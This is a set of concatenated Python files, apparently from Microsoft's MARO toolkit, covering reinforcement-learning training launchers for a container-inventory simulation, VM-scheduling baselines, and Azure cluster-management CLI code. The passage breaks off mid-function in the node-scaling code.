from maro.rl import AgentManagerMode, SimpleActor, SimpleLearner, TwoPhaseLinearParameterScheduler
from maro.simulator import Env
from maro.utils import LogFormat, Logger, convert_dottable
from components import CIMActionShaper, CIMStateShaper, DQNAgentManager, TruncatedExperienceShaper, create_dqn_agents
def launch(config):
config = convert_dottable(config)
# Step 1: Initialize a CIM environment for using a toy dataset.
env = Env(config.env.scenario, config.env.topology, durations=config.env.durations)
agent_id_list = [str(agent_id) for agent_id in env.agent_idx_list]
action_space = list(np.linspace(-1.0, 1.0, config.agents.algorithm.num_actions))
# Step 2: Create state, action and experience shapers. We also need to create an explorer here due to the
# greedy nature of the DQN algorithm.
state_shaper = CIMStateShaper(**config.env.state_shaping)
action_shaper = CIMActionShaper(action_space=action_space)
experience_shaper = TruncatedExperienceShaper(**config.env.experience_shaping)
# Step 3: Create agents and an agent manager.
config["agents"]["algorithm"]["input_dim"] = state_shaper.dim
agent_manager = DQNAgentManager(
name="cim_learner",
mode=AgentManagerMode.TRAIN_INFERENCE,
agent_dict=create_dqn_agents(agent_id_list, config.agents),
state_shaper=state_shaper,
action_shaper=action_shaper,
experience_shaper=experience_shaper
)
# Step 4: Create an actor and a learner to start the training process.
scheduler = TwoPhaseLinearParameterScheduler(config.main_loop.max_episode, **config.main_loop.exploration)
actor = SimpleActor(env, agent_manager)
learner = SimpleLearner(
agent_manager, actor, scheduler,
logger=Logger("cim_learner", format_=LogFormat.simple, auto_timestamp=False)
)
learner.learn()
learner.test()
learner.dump_models(os.path.join(os.getcwd(), "models"))
if __name__ == "__main__":
from components.config import config
launch(config)
--- FILE SEPARATOR ---
# Copyright (c) Microsoft Corporation.
# Licensed under the MIT license.
from .action_shaper import CIMActionShaper
from .agent_manager import POAgentManager, create_po_agents
from .experience_shaper import TruncatedExperienceShaper
from .state_shaper import CIMStateShaper
__all__ = [
"CIMActionShaper",
"POAgentManager", "create_po_agents",
"TruncatedExperienceShaper",
"CIMStateShaper"
]
--- FILE SEPARATOR ---
# Copyright (c) Microsoft Corporation.
# Licensed under the MIT license.
import numpy as np
import torch.nn as nn
from torch.optim import Adam, RMSprop
from maro.rl import (
AbsAgent, ActorCritic, ActorCriticConfig, FullyConnectedBlock, LearningModel, NNStack,
OptimizerOptions, PolicyGradient, PolicyOptimizationConfig, SimpleAgentManager
)
from maro.utils import set_seeds
class POAgent(AbsAgent):
def train(self, states: np.ndarray, actions: np.ndarray, log_action_prob: np.ndarray, rewards: np.ndarray):
self._algorithm.train(states, actions, log_action_prob, rewards)
def create_po_agents(agent_id_list, config):
input_dim, num_actions = config.input_dim, config.num_actions
set_seeds(config.seed)
agent_dict = {}
for agent_id in agent_id_list:
actor_net = NNStack(
"actor",
FullyConnectedBlock(
input_dim=input_dim,
output_dim=num_actions,
activation=nn.Tanh,
is_head=True,
**config.actor_model
)
)
if config.type == "actor_critic":
critic_net = NNStack(
"critic",
FullyConnectedBlock(
input_dim=config.input_dim,
output_dim=1,
activation=nn.LeakyReLU,
is_head=True,
**config.critic_model
)
)
hyper_params = config.actor_critic_hyper_parameters
hyper_params.update({"reward_discount": config.reward_discount})
learning_model = LearningModel(
actor_net, critic_net,
optimizer_options={
"actor": OptimizerOptions(cls=Adam, params=config.actor_optimizer),
"critic": OptimizerOptions(cls=RMSprop, params=config.critic_optimizer)
}
)
algorithm = ActorCritic(
learning_model, ActorCriticConfig(critic_loss_func=nn.SmoothL1Loss(), **hyper_params)
)
else:
learning_model = LearningModel(
actor_net,
optimizer_options=OptimizerOptions(cls=Adam, params=config.actor_optimizer)
)
algorithm = PolicyGradient(learning_model, PolicyOptimizationConfig(config.reward_discount))
agent_dict[agent_id] = POAgent(name=agent_id, algorithm=algorithm)
return agent_dict
class POAgentManager(SimpleAgentManager):
def train(self, experiences_by_agent: dict):
for agent_id, exp in experiences_by_agent.items():
if not isinstance(exp, list):
exp = [exp]
for trajectory in exp:
self.agent_dict[agent_id].train(
trajectory["state"],
trajectory["action"],
trajectory["log_action_probability"],
trajectory["reward"]
)
--- FILE SEPARATOR ---
# Copyright (c) Microsoft Corporation.
# Licensed under the MIT license.
from collections import defaultdict
import numpy as np
from maro.rl import ExperienceShaper
class TruncatedExperienceShaper(ExperienceShaper):
def __init__(self, *, time_window: int, time_decay_factor: float, fulfillment_factor: float,
shortage_factor: float):
super().__init__(reward_func=None)
self._time_window = time_window
self._time_decay_factor = time_decay_factor
self._fulfillment_factor = fulfillment_factor
self._shortage_factor = shortage_factor
def __call__(self, trajectory, snapshot_list):
agent_ids = np.asarray(trajectory.get_by_key("agent_id"))
states = np.asarray(trajectory.get_by_key("state"))
actions = np.asarray(trajectory.get_by_key("action"))
log_action_probabilities = np.asarray(trajectory.get_by_key("log_action_probability"))
rewards = np.fromiter(
map(self._compute_reward, trajectory.get_by_key("event"), [snapshot_list] * len(trajectory)),
dtype=np.float32
)
return {agent_id: {
"state": states[agent_ids == agent_id],
"action": actions[agent_ids == agent_id],
"log_action_probability": log_action_probabilities[agent_ids == agent_id],
"reward": rewards[agent_ids == agent_id],
}
for agent_id in set(agent_ids)}
def _compute_reward(self, decision_event, snapshot_list):
start_tick = decision_event.tick + 1
end_tick = decision_event.tick + self._time_window
ticks = list(range(start_tick, end_tick))
# calculate tc reward
future_fulfillment = snapshot_list["ports"][ticks::"fulfillment"]
future_shortage = snapshot_list["ports"][ticks::"shortage"]
decay_list = [self._time_decay_factor ** i for i in range(end_tick - start_tick)
for _ in range(future_fulfillment.shape[0]//(end_tick-start_tick))]
tot_fulfillment = np.dot(future_fulfillment, decay_list)
tot_shortage = np.dot(future_shortage, decay_list)
return np.float(self._fulfillment_factor * tot_fulfillment - self._shortage_factor * tot_shortage)
--- FILE SEPARATOR ---
# Copyright (c) Microsoft Corporation.
# Licensed under the MIT license.
import os
import numpy as np
from maro.simulator import Env
from maro.rl import AgentManagerMode, SimpleActor, ActorWorker
from maro.utils import convert_dottable
from components import CIMActionShaper, CIMStateShaper, POAgentManager, TruncatedExperienceShaper, create_po_agents
def launch(config):
config = convert_dottable(config)
env = Env(config.env.scenario, config.env.topology, durations=config.env.durations)
agent_id_list = [str(agent_id) for agent_id in env.agent_idx_list]
state_shaper = CIMStateShaper(**config.env.state_shaping)
action_shaper = CIMActionShaper(action_space=list(np.linspace(-1.0, 1.0, config.agents.num_actions)))
experience_shaper = TruncatedExperienceShaper(**config.env.experience_shaping)
config["agents"]["input_dim"] = state_shaper.dim
agent_manager = POAgentManager(
name="cim_actor",
mode=AgentManagerMode.INFERENCE,
agent_dict=create_po_agents(agent_id_list, config.agents),
state_shaper=state_shaper,
action_shaper=action_shaper,
experience_shaper=experience_shaper,
)
proxy_params = {
"group_name": os.environ["GROUP"],
"expected_peers": {"learner": 1},
"redis_address": ("localhost", 6379)
}
actor_worker = ActorWorker(
local_actor=SimpleActor(env=env, agent_manager=agent_manager),
proxy_params=proxy_params
)
actor_worker.launch()
if __name__ == "__main__":
from components.config import config
launch(config)
--- FILE SEPARATOR ---
# Copyright (c) Microsoft Corporation.
# Licensed under the MIT license.
import os
from maro.rl import ActorProxy, AgentManagerMode, Scheduler, SimpleLearner, merge_experiences_with_trajectory_boundaries
from maro.simulator import Env
from maro.utils import Logger, convert_dottable
from components import CIMStateShaper, POAgentManager, create_po_agents
def launch(config):
config = convert_dottable(config)
env = Env(config.env.scenario, config.env.topology, durations=config.env.durations)
agent_id_list = [str(agent_id) for agent_id in env.agent_idx_list]
config["agents"]["input_dim"] = CIMStateShaper(**config.env.state_shaping).dim
agent_manager = POAgentManager(
name="cim_learner",
mode=AgentManagerMode.TRAIN,
agent_dict=create_po_agents(agent_id_list, config.agents)
)
proxy_params = {
"group_name": os.environ["GROUP"],
"expected_peers": {"actor": int(os.environ["NUM_ACTORS"])},
"redis_address": ("localhost", 6379)
}
learner = SimpleLearner(
agent_manager=agent_manager,
actor=ActorProxy(
proxy_params=proxy_params, experience_collecting_func=merge_experiences_with_trajectory_boundaries
),
scheduler=Scheduler(config.main_loop.max_episode),
logger=Logger("cim_learner", auto_timestamp=False)
)
learner.learn()
learner.test()
learner.dump_models(os.path.join(os.getcwd(), "models"))
learner.exit()
if __name__ == "__main__":
from components.config import config
launch(config)
--- FILE SEPARATOR ---
# Copyright (c) Microsoft Corporation.
# Licensed under the MIT license.
"""
This script is used to debug distributed algorithm in single host multi-process mode.
"""
import argparse
import os
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument("group_name", help="group name")
parser.add_argument("num_actors", type=int, help="number of actors")
args = parser.parse_args()
learner_path = f"{os.path.split(os.path.realpath(__file__))[0]}/dist_learner.py &"
actor_path = f"{os.path.split(os.path.realpath(__file__))[0]}/dist_actor.py &"
# Launch the learner process
os.system(f"GROUP={args.group_name} NUM_ACTORS={args.num_actors} python " + learner_path)
# Launch the actor processes
for _ in range(args.num_actors):
os.system(f"GROUP={args.group_name} python " + actor_path)
--- FILE SEPARATOR ---
# Copyright (c) Microsoft Corporation.
# Licensed under the MIT license.
import os
from statistics import mean
import numpy as np
from maro.simulator import Env
from maro.rl import AgentManagerMode, Scheduler, SimpleActor, SimpleLearner
from maro.utils import LogFormat, Logger, convert_dottable
from components import CIMActionShaper, CIMStateShaper, POAgentManager, TruncatedExperienceShaper, create_po_agents
class EarlyStoppingChecker:
"""Callable class that checks the performance history to determine early stopping.
Args:
warmup_ep (int): Episode from which early stopping checking is initiated.
last_k (int): Number of latest performance records to check for early stopping.
perf_threshold (float): The mean of the ``last_k`` performance metric values must be above this value to
trigger early stopping.
perf_stability_threshold (float): The maximum one-step change over the ``last_k`` performance metrics must be
below this value to trigger early stopping.
"""
def __init__(self, warmup_ep: int, last_k: int, perf_threshold: float, perf_stability_threshold: float):
self._warmup_ep = warmup_ep
self._last_k = last_k
self._perf_threshold = perf_threshold
self._perf_stability_threshold = perf_stability_threshold
def get_metric(record):
return 1 - record["container_shortage"] / record["order_requirements"]
self._metric_func = get_metric
def __call__(self, perf_history) -> bool:
if len(perf_history) < max(self._last_k, self._warmup_ep):
return False
metric_series = list(map(self._metric_func, perf_history[-self._last_k:]))
max_delta = max(
abs(metric_series[i] - metric_series[i - 1]) / metric_series[i - 1] for i in range(1, self._last_k)
)
print(f"mean_metric: {mean(metric_series)}, max_delta: {max_delta}")
return mean(metric_series) > self._perf_threshold and max_delta < self._perf_stability_threshold
def launch(config):
# First determine the input dimension and add it to the config.
config = convert_dottable(config)
# Step 1: initialize a CIM environment for using a toy dataset.
env = Env(config.env.scenario, config.env.topology, durations=config.env.durations)
agent_id_list = [str(agent_id) for agent_id in env.agent_idx_list]
# Step 2: create state, action and experience shapers. We also need to create an explorer here due to the
# greedy nature of the DQN algorithm.
state_shaper = CIMStateShaper(**config.env.state_shaping)
action_shaper = CIMActionShaper(action_space=list(np.linspace(-1.0, 1.0, config.agents.num_actions)))
experience_shaper = TruncatedExperienceShaper(**config.env.experience_shaping)
# Step 3: create an agent manager.
config["agents"]["input_dim"] = state_shaper.dim
agent_manager = POAgentManager(
name="cim_learner",
mode=AgentManagerMode.TRAIN_INFERENCE,
agent_dict=create_po_agents(agent_id_list, config.agents),
state_shaper=state_shaper,
action_shaper=action_shaper,
experience_shaper=experience_shaper,
)
# Step 4: Create an actor and a learner to start the training process.
scheduler = Scheduler(
config.main_loop.max_episode,
early_stopping_checker=EarlyStoppingChecker(**config.main_loop.early_stopping)
)
actor = SimpleActor(env, agent_manager)
learner = SimpleLearner(
agent_manager, actor, scheduler,
logger=Logger("cim_learner", format_=LogFormat.simple, auto_timestamp=False)
)
learner.learn()
learner.test()
learner.dump_models(os.path.join(os.getcwd(), "models"))
if __name__ == "__main__":
from components.config import config
launch(config)
--- FILE SEPARATOR ---
import io
import os
import random
import timeit
import yaml
from maro.simulator import Env
from maro.simulator.scenarios.vm_scheduling import AllocateAction, DecisionPayload, PostponeAction
from maro.utils import convert_dottable
CONFIG_PATH = os.path.join(os.path.split(os.path.realpath(__file__))[0], "config.yml")
with io.open(CONFIG_PATH, "r") as in_file:
raw_config = yaml.safe_load(in_file)
config = convert_dottable(raw_config)
if __name__ == "__main__":
start_time = timeit.default_timer()
env = Env(
scenario=config.env.scenario,
topology=config.env.topology,
start_tick=config.env.start_tick,
durations=config.env.durations,
snapshot_resolution=config.env.resolution
)
if config.env.seed is not None:
env.set_seed(config.env.seed)
random.seed(config.env.seed)
metrics: object = None
decision_event: DecisionPayload = None
is_done: bool = False
action: AllocateAction = None
metrics, decision_event, is_done = env.step(None)
while not is_done:
valid_pm_num: int = len(decision_event.valid_pms)
if valid_pm_num <= 0:
# No valid PM now, postpone.
action: PostponeAction = PostponeAction(
vm_id=decision_event.vm_id,
postpone_step=1
)
else:
# Get the capacity and allocated cores from snapshot.
valid_pm_info = env.snapshot_list["pms"][
env.frame_index:decision_event.valid_pms:["cpu_cores_capacity", "cpu_cores_allocated"]
].reshape(-1, 2)
# Calculate to get the remaining cpu cores.
cpu_cores_remaining = valid_pm_info[:, 0] - valid_pm_info[:, 1]
# Choose the one with the closet remaining CPU.
chosen_idx = 0
minimum_remaining_cpu_cores = cpu_cores_remaining[0]
for i, remaining in enumerate(cpu_cores_remaining):
if remaining < minimum_remaining_cpu_cores:
chosen_idx = i
minimum_remaining_cpu_cores = remaining
# Take action to allocate on the closet pm.
action: AllocateAction = AllocateAction(
vm_id=decision_event.vm_id,
pm_id=decision_event.valid_pms[chosen_idx]
)
metrics, decision_event, is_done = env.step(action)
end_time = timeit.default_timer()
print(
f"[Best fit] Topology: {config.env.topology}. Total ticks: {config.env.durations}."
f" Start tick: {config.env.start_tick}."
)
print(f"[Timer] {end_time - start_time:.2f} seconds to finish the simulation.")
print(metrics)
--- FILE SEPARATOR ---
import io
import os
import random
import timeit
import yaml
from maro.simulator import Env
from maro.simulator.scenarios.vm_scheduling import AllocateAction, DecisionPayload, PostponeAction
from maro.utils import convert_dottable
CONFIG_PATH = os.path.join(os.path.split(os.path.realpath(__file__))[0], "config.yml")
with io.open(CONFIG_PATH, "r") as in_file:
raw_config = yaml.safe_load(in_file)
config = convert_dottable(raw_config)
if __name__ == "__main__":
start_time = timeit.default_timer()
env = Env(
scenario=config.env.scenario,
topology=config.env.topology,
start_tick=config.env.start_tick,
durations=config.env.durations,
snapshot_resolution=config.env.resolution
)
if config.env.seed is not None:
env.set_seed(config.env.seed)
random.seed(config.env.seed)
metrics: object = None
decision_event: DecisionPayload = None
is_done: bool = False
action: AllocateAction = None
metrics, decision_event, is_done = env.step(None)
while not is_done:
valid_pm_num: int = len(decision_event.valid_pms)
if valid_pm_num <= 0:
# No valid PM now, postpone.
action: PostponeAction = PostponeAction(
vm_id=decision_event.vm_id,
postpone_step=1
)
else:
# Randomly choose an available PM.
random_idx = random.randint(0, valid_pm_num - 1)
pm_id = decision_event.valid_pms[random_idx]
action: AllocateAction = AllocateAction(
vm_id=decision_event.vm_id,
pm_id=pm_id
)
metrics, decision_event, is_done = env.step(action)
end_time = timeit.default_timer()
print(
f"[Random] Topology: {config.env.topology}. Total ticks: {config.env.durations}.",
f" Start tick: {config.env.start_tick}"
)
print(f"[Timer] {end_time - start_time:.2f} seconds to finish the simulation.")
print(metrics)
--- FILE SEPARATOR ---
# Copyright (c) Microsoft Corporation.
# Licensed under the MIT license.
import yaml
from maro.cli.grass.executors.grass_azure_executor import GrassAzureExecutor
from maro.cli.grass.executors.grass_on_premises_executor import GrassOnPremisesExecutor
from maro.utils.exception.cli_exception import BadRequestError, FileOperationError, InvalidDeploymentTemplateError
def create(deployment_path: str, **kwargs):
try:
with open(deployment_path, "r") as fr:
create_deployment = yaml.safe_load(fr)
if create_deployment["mode"] == "grass/azure":
GrassAzureExecutor.build_cluster_details(create_deployment=create_deployment)
executor = GrassAzureExecutor(cluster_name=create_deployment["name"])
executor.create()
elif create_deployment["mode"] == "grass/on-premises":
GrassOnPremisesExecutor.build_cluster_details(create_deployment=create_deployment)
executor = GrassOnPremisesExecutor(cluster_name=create_deployment["name"])
executor.create()
else:
raise BadRequestError(f"Unsupported command in mode '{create_deployment['mode']}'.")
except KeyError as e:
raise InvalidDeploymentTemplateError(f"Missing key '{e.args[0]}'.")
except FileNotFoundError:
raise FileOperationError("Invalid template file path.")
--- FILE SEPARATOR ---
# Copyright (c) Microsoft Corporation.
# Licensed under the MIT license.
from maro.cli.grass.executors.grass_azure_executor import GrassAzureExecutor
from maro.cli.utils.checkers import check_details_validity
from maro.cli.utils.details import load_cluster_details
from maro.cli.utils.lock import lock
from maro.utils.exception.cli_exception import BadRequestError
@check_details_validity
@lock
def push_data(cluster_name: str, local_path: str, remote_path: str, **kwargs):
cluster_details = load_cluster_details(cluster_name=cluster_name)
if cluster_details["mode"] in ["grass/azure", "grass/on-premises"]:
executor = GrassAzureExecutor(cluster_name=cluster_name)
executor.push_data(local_path=local_path, remote_path=remote_path)
else:
raise BadRequestError(f"Unsupported command in mode '{cluster_details['mode']}'.")
@check_details_validity
@lock
def pull_data(cluster_name: str, local_path: str, remote_path: str, **kwargs):
cluster_details = load_cluster_details(cluster_name=cluster_name)
if cluster_details["mode"] in ["grass/azure", "grass/on-premises"]:
executor = GrassAzureExecutor(cluster_name=cluster_name)
executor.pull_data(local_path=local_path, remote_path=remote_path)
else:
raise BadRequestError(f"Unsupported command in mode '{cluster_details['mode']}'.")
--- FILE SEPARATOR ---
# Copyright (c) Microsoft Corporation.
# Licensed under the MIT license.
from maro.cli.grass.executors.grass_azure_executor import GrassAzureExecutor
from maro.cli.grass.executors.grass_on_premises_executor import GrassOnPremisesExecutor
from maro.cli.utils.checkers import check_details_validity
from maro.cli.utils.details import load_cluster_details
from maro.cli.utils.lock import lock
from maro.utils.exception.cli_exception import BadRequestError
@check_details_validity
@lock
def delete(cluster_name: str, **kwargs):
cluster_details = load_cluster_details(cluster_name=cluster_name)
if cluster_details["mode"] == "grass/azure":
executor = GrassAzureExecutor(cluster_name=cluster_name)
executor.delete()
elif cluster_details["mode"] == "grass/on-premises":
executor = GrassOnPremisesExecutor(cluster_name=cluster_name)
executor.delete()
else:
raise BadRequestError(f"Unsupported command in mode '{cluster_details['mode']}'.")
--- FILE SEPARATOR ---
# Copyright (c) Microsoft Corporation.
# Licensed under the MIT license.
import collections
import json
import os
import secrets
import shutil
import string
import threading
import time
from copy import deepcopy
from multiprocessing.pool import ThreadPool
import yaml
from maro.cli.grass.executors.grass_executor import GrassExecutor
from maro.cli.grass.utils.copy import copy_and_rename, copy_files_from_node, copy_files_to_node
from maro.cli.grass.utils.hash import get_checksum
from maro.cli.utils.details import (
load_cluster_details, load_job_details, load_schedule_details, save_cluster_details, save_job_details,
save_schedule_details
)
from maro.cli.utils.executors.azure_executor import AzureExecutor
from maro.cli.utils.naming import (
generate_cluster_id, generate_component_id, generate_job_id, generate_node_name, get_valid_file_name
)
from maro.cli.utils.params import GlobalParams, GlobalPaths
from maro.cli.utils.subprocess import SubProcess
from maro.cli.utils.validation import validate_and_fill_dict
from maro.utils.exception.cli_exception import BadRequestError, CommandExecutionError, FileOperationError
from maro.utils.logger import CliLogger
logger = CliLogger(name=__name__)
class GrassAzureExecutor:
def __init__(self, cluster_name: str):
self.cluster_name = cluster_name
self.cluster_details = load_cluster_details(cluster_name=cluster_name)
self.grass_executor = GrassExecutor(cluster_details=self.cluster_details)
# maro grass create
@staticmethod
def build_cluster_details(create_deployment: dict):
# Standardize create deployment
GrassAzureExecutor._standardize_create_deployment(create_deployment=create_deployment)
# Get cluster name and save details
cluster_name = create_deployment["name"]
if os.path.isdir(f"{GlobalPaths.ABS_MARO_CLUSTERS}/{cluster_name}"):
raise BadRequestError(f"Cluster '{cluster_name}' is exist.")
os.makedirs(f"{GlobalPaths.ABS_MARO_CLUSTERS}/{cluster_name}")
save_cluster_details(
cluster_name=cluster_name,
cluster_details=create_deployment
)
@staticmethod
def _standardize_create_deployment(create_deployment: dict):
samba_password = "".join(secrets.choice(string.ascii_letters + string.digits) for _ in range(20))
optional_key_to_value = {
"root['master']['redis']": {"port": GlobalParams.DEFAULT_REDIS_PORT},
"root['master']['redis']['port']": GlobalParams.DEFAULT_REDIS_PORT,
"root['master']['fluentd']": {"port": GlobalParams.DEFAULT_FLUENTD_PORT},
"root['master']['fluentd']['port']": GlobalParams.DEFAULT_FLUENTD_PORT,
"root['master']['samba']": {"password": samba_password},
"root['master']['samba']['password']": samba_password,
"root['connection']": {"ssh": {"port": GlobalParams.DEFAULT_SSH_PORT}},
"root['connection']['ssh']": {"port": GlobalParams.DEFAULT_SSH_PORT},
"root['connection']['ssh']['port']": GlobalParams.DEFAULT_SSH_PORT
}
with open(f"{GlobalPaths.ABS_MARO_GRASS_LIB}/deployments/internal/grass_azure_create.yml") as fr:
create_deployment_template = yaml.safe_load(fr)
validate_and_fill_dict(
template_dict=create_deployment_template,
actual_dict=create_deployment,
optional_key_to_value=optional_key_to_value
)
def create(self):
logger.info("Creating cluster")
# Start creating
try:
self._set_cluster_id()
self._create_resource_group()
self._create_vnet()
# Simultaneously capture image and init master
build_node_image_thread = threading.Thread(target=self._build_node_image, args=())
build_node_image_thread.start()
create_and_init_master_thread = threading.Thread(target=self._create_and_init_master, args=())
create_and_init_master_thread.start()
build_node_image_thread.join()
create_and_init_master_thread.join()
except Exception as e:
# If failed, remove details folder, then raise
shutil.rmtree(f"{GlobalPaths.ABS_MARO_CLUSTERS}/{self.cluster_name}")
raise e
logger.info_green(f"Cluster {self.cluster_name} is created")
def _set_cluster_id(self):
# Set cluster id
self.cluster_details["id"] = generate_cluster_id()
# Save details
save_cluster_details(
cluster_name=self.cluster_name,
cluster_details=self.cluster_details
)
def _create_resource_group(self):
# Load and reload details
subscription = self.cluster_details["cloud"]["subscription"]
resource_group = self.cluster_details["cloud"]["resource_group"]
location = self.cluster_details["cloud"]["location"]
# Check if Azure CLI is installed
version_details = AzureExecutor.get_version()
logger.info_green(f"Your Azure CLI version: {version_details['azure-cli']}")
# Set subscription id
AzureExecutor.set_subscription(subscription=subscription)
logger.info_green(f"Set subscription to: {subscription}")
# Check and create resource group
resource_group_details = AzureExecutor.get_resource_group(resource_group=resource_group)
if resource_group_details is not None:
logger.warning_yellow(f"Azure resource group {resource_group} already exists")
else:
AzureExecutor.create_resource_group(
resource_group=resource_group,
location=location
)
logger.info_green(f"Resource group: {resource_group} is created")
def _create_vnet(self):
logger.info("Creating vnet")
# Load details
resource_group = self.cluster_details["cloud"]["resource_group"]
# Create ARM parameters and start deployment
abs_template_file_path = f"{GlobalPaths.ABS_MARO_GRASS_LIB}/azure/create_vnet/template.json"
abs_parameters_file_path = (
f"{GlobalPaths.ABS_MARO_CLUSTERS}/{self.cluster_name}/azure/create_vnet/parameters.json"
)
ArmTemplateParameterBuilder.create_vnet(
cluster_details=self.cluster_details,
export_path=abs_parameters_file_path
)
AzureExecutor.start_deployment(
resource_group=resource_group,
deployment_name="vnet",
template_file_path=abs_template_file_path,
parameters_file_path=abs_parameters_file_path
)
logger.info_green("Vnet is created")
def _build_node_image(self):
logger.info("Building MARO Node image")
# Load details
resource_name = "build-node-image"
cluster_id = self.cluster_details["id"]
resource_group = self.cluster_details["cloud"]["resource_group"]
admin_username = self.cluster_details["user"]["admin_username"]
ssh_port = self.cluster_details["connection"]["ssh"]["port"]
image_name = f"{cluster_id}-node-image"
vm_name = f"{cluster_id}-{resource_name}-vm"
# Create ARM parameters and start deployment
template_file_path = f"{GlobalPaths.ABS_MARO_GRASS_LIB}/azure/create_build_node_image_vm/template.json"
parameters_file_path = (
f"{GlobalPaths.ABS_MARO_CLUSTERS}/{self.cluster_name}/azure/create_build_node_image_vm/parameters.json"
)
ArmTemplateParameterBuilder.create_build_node_image_vm(
cluster_details=self.cluster_details,
node_size="Standard_D4_v3",
export_path=parameters_file_path
)
AzureExecutor.start_deployment(
resource_group=resource_group,
deployment_name=resource_name,
template_file_path=template_file_path,
parameters_file_path=parameters_file_path
)
# Gracefully wait
time.sleep(10)
# Get IP addresses
ip_addresses = AzureExecutor.list_ip_addresses(
resource_group=resource_group,
vm_name=vm_name
)
public_ip_address = ip_addresses[0]["virtualMachine"]["network"]["publicIpAddresses"][0]["ipAddress"]
# Make sure capture-node-image-vm is able to connect
self.grass_executor.retry_connection_and_set_ssh_port(node_ip_address=public_ip_address)
# Run init image script
self._sync_mkdir(path=GlobalPaths.MARO_LOCAL_TMP, node_ip_address=public_ip_address)
copy_files_to_node(
local_path=f"{GlobalPaths.MARO_GRASS_LIB}/scripts/init_build_node_image_vm.py",
remote_dir="~/",
admin_username=admin_username, node_ip_address=public_ip_address, ssh_port=ssh_port
)
self.grass_executor.remote_init_build_node_image_vm(vm_ip_address=public_ip_address)
# Extract image
AzureExecutor.deallocate_vm(resource_group=resource_group, vm_name=vm_name)
AzureExecutor.generalize_vm(resource_group=resource_group, vm_name=vm_name)
AzureExecutor.create_image_from_vm(resource_group=resource_group, image_name=image_name, vm_name=vm_name)
# Delete resources
self._delete_resources(resource_name=resource_name)
logger.info_green("MARO Node Image is built")
def _create_and_init_master(self):
logger.info("Creating MARO Master")
self._create_master()
self._init_master()
logger.info_green("MARO Master is created")
def _create_master(self):
logger.info("Creating Master VM")
# Load details
master_details = self.cluster_details["master"]
cluster_id = self.cluster_details["id"]
resource_group = self.cluster_details["cloud"]["resource_group"]
admin_username = self.cluster_details["user"]["admin_username"]
node_size = self.cluster_details["master"]["node_size"]
# Create ARM parameters and start deployment
template_file_path = f"{GlobalPaths.ABS_MARO_GRASS_LIB}/azure/create_master/template.json"
parameters_file_path = (
f"{GlobalPaths.ABS_MARO_CLUSTERS}/{self.cluster_name}/azure/create_master/parameters.json"
)
ArmTemplateParameterBuilder.create_master(
cluster_details=self.cluster_details,
node_size=node_size,
export_path=parameters_file_path
)
AzureExecutor.start_deployment(
resource_group=resource_group,
deployment_name="master",
template_file_path=template_file_path,
parameters_file_path=parameters_file_path
)
# Get master IP addresses
ip_addresses = AzureExecutor.list_ip_addresses(
resource_group=resource_group,
vm_name=f"{cluster_id}-master-vm"
)
public_ip_address = ip_addresses[0]["virtualMachine"]["network"]["publicIpAddresses"][0]["ipAddress"]
private_ip_address = ip_addresses[0]["virtualMachine"]["network"]["privateIpAddresses"][0]
hostname = f"{cluster_id}-master-vm"
master_details["public_ip_address"] = public_ip_address
master_details["private_ip_address"] = private_ip_address
master_details["hostname"] = hostname
master_details["resource_name"] = f"{cluster_id}-master-vm"
logger.info_green(f"You can login to your master node with: ssh {admin_username}@{public_ip_address}")
# Save details
save_cluster_details(
cluster_name=self.cluster_name,
cluster_details=self.cluster_details,
sync=False
)
logger.info_green("Master VM is created")
def _init_master(self):
logger.info("Initializing Master VM")
# Load details
master_details = self.cluster_details["master"]
admin_username = self.cluster_details["user"]["admin_username"]
master_public_ip_address = self.cluster_details["master"]["public_ip_address"]
ssh_port = self.cluster_details["connection"]["ssh"]["port"]
# Make sure master is able to connect
self.grass_executor.retry_connection_and_set_ssh_port(node_ip_address=master_public_ip_address)
# Create folders
self._sync_mkdir(path=GlobalPaths.MARO_GRASS_LIB, node_ip_address=master_public_ip_address)
self._sync_mkdir(
path=f"{GlobalPaths.MARO_CLUSTERS}/{self.cluster_name}",
node_ip_address=master_public_ip_address
)
self._sync_mkdir(
path=f"{GlobalPaths.MARO_CLUSTERS}/{self.cluster_name}/data",
node_ip_address=master_public_ip_address
)
self._sync_mkdir(
path=f"{GlobalPaths.MARO_CLUSTERS}/{self.cluster_name}/images",
node_ip_address=master_public_ip_address
)
self._sync_mkdir(
path=f"{GlobalPaths.MARO_CLUSTERS}/{self.cluster_name}/jobs",
node_ip_address=master_public_ip_address
)
self._sync_mkdir(
path=f"{GlobalPaths.MARO_CLUSTERS}/{self.cluster_name}/schedules",
node_ip_address=master_public_ip_address
)
self._sync_mkdir(path=GlobalPaths.MARO_LOCAL_TMP, node_ip_address=master_public_ip_address)
# Copy required files
copy_files_to_node(
local_path=GlobalPaths.MARO_GRASS_LIB,
remote_dir=GlobalPaths.MARO_LIB,
admin_username=admin_username, node_ip_address=master_public_ip_address, ssh_port=ssh_port
)
copy_files_to_node(
local_path=f"{GlobalPaths.MARO_CLUSTERS}/{self.cluster_name}",
remote_dir=GlobalPaths.MARO_CLUSTERS,
admin_username=admin_username, node_ip_address=master_public_ip_address, ssh_port=ssh_port
)
# Get public key
public_key = self.grass_executor.remote_get_public_key(node_ip_address=master_public_ip_address)
# Remote init master
self.grass_executor.remote_init_master()
# Load master agent service
self.grass_executor.remote_load_master_agent_service()
# Save details
master_details["public_key"] = public_key
master_details["image_files"] = {}
save_cluster_details(
cluster_name=self.cluster_name,
cluster_details=self.cluster_details
)
self.grass_executor.remote_set_master_details(master_details=master_details)
logger.info_green("Master VM is initialized")
# maro grass delete
def delete(self):
# Load details
cluster_id = self.cluster_details["id"]
resource_group = self.cluster_details["cloud"]["resource_group"]
logger.info(f"Deleting cluster {self.cluster_name}")
# Get resource list
resource_list = AzureExecutor.list_resources(resource_group=resource_group)
# Filter resources
deletable_ids = []
for resource_info in resource_list:
if resource_info["name"].startswith(cluster_id):
deletable_ids.append(resource_info["id"])
# Delete resources
if len(deletable_ids) > 0:
AzureExecutor.delete_resources(resources=deletable_ids)
# Delete cluster folder
shutil.rmtree(f"{GlobalPaths.ABS_MARO_CLUSTERS}/{self.cluster_name}")
logger.info_green(f"Cluster {self.cluster_name} is deleted")
# maro grass node
def scale_node(self, replicas: int, node_size: str):
# Load details
nodes_details = self.grass_executor.remote_get_nodes_details()
# Init node_size_to_count
node_size_to_count = collections.defaultdict(lambda: 0)
for node_name, node_details in nodes_details.items():
node_size_to_count[node_details["node_size"]] += 1
# Get node_size_to_spec
node_size_to_spec = self._get_node_size_to_spec()
if node_size not in node_size_to_spec:
